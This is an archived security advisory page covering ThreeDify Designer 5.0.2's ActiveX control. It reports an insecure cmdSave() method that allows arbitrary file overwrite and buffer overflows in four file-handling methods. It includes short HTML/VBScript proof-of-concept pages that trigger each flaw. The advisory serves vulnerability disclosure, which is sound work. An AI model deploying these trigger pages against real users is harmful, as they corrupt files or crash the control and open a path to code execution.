what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ThreeDify Designer 5.0.2 Insecure Method / Buffer Overflows

ThreeDify Designer 5.0.2 Insecure Method / Buffer Overflows
Posted Aug 4, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

ThreeDify Designer version 5.0.2 suffers from Active-X insecure method and buffer overflow vulnerabilities.

tags | exploit, overflow, vulnerability, activex
SHA-256 | a9ef54977565ac62eb5fc5f2fbc83d8daf0981d58baae77d3116595349ead071

ThreeDify Designer 5.0.2 Insecure Method / Buffer Overflows

Change Mirror Download
=========================================
Vulnerability ID: HTB23021
Reference: http://www.htbridge.ch/advisory/threedify_designer_activex_control_insecure_method.html
Product: ThreeDify Designer
Vendor: ThreeDify ( http://www.threedify.com )
Vulnerable Version: 5.0.2 and probably prior
Tested on: 5.0.2
Vendor Notification: 07 June 2011
Vulnerability Type: Insecure Method
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a vulnerability in ThreeDify Designer ActiveX control, which can be exploited to overwrite arbitrary files.

The vulnerability is caused due to the ThreeDify.ThreeDifyDesigner.1 (ActiveSolid.dll) ActiveX control including the insecure "cmdSave()" method.
This can be exploited to corrupt arbitrary files in the context of the currently logged-on user.

The following PoC code is available:


<html>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create_or_to_overwrite"
target.cmdSave arg1
End Sub

</script>
</html>

Solution: Upgrade to the most recent version


=========================================
Vulnerability ID: HTB23020
Reference: http://www.htbridge.ch/advisory/threedify_designer_activex_control_multiple_buffer_overflow_vulnerabilities.html
Product: ThreeDify Designer
Vendor: ThreeDify ( http://www.threedify.com )
Vulnerable Version: 5.0.2 and probably prior
Tested on: 5.0.2
Vendor Notification: 07 June 2011
Vulnerability Type: Buffer Overflow
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a multiple buffer overflow vulnerabilities in ThreeDify Designer ActiveX control.

1) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdExport()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdExport arg1
</script>
</body>
</html>


2) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdImport()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdImport arg1
</script>
</body>
</html>


3) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdOpen()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdOpen arg1
</script>
</body>
</html>


4) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdSave()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdSave arg1
</script>
</body>
</html>

Solution: Upgrade to the most recent version
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close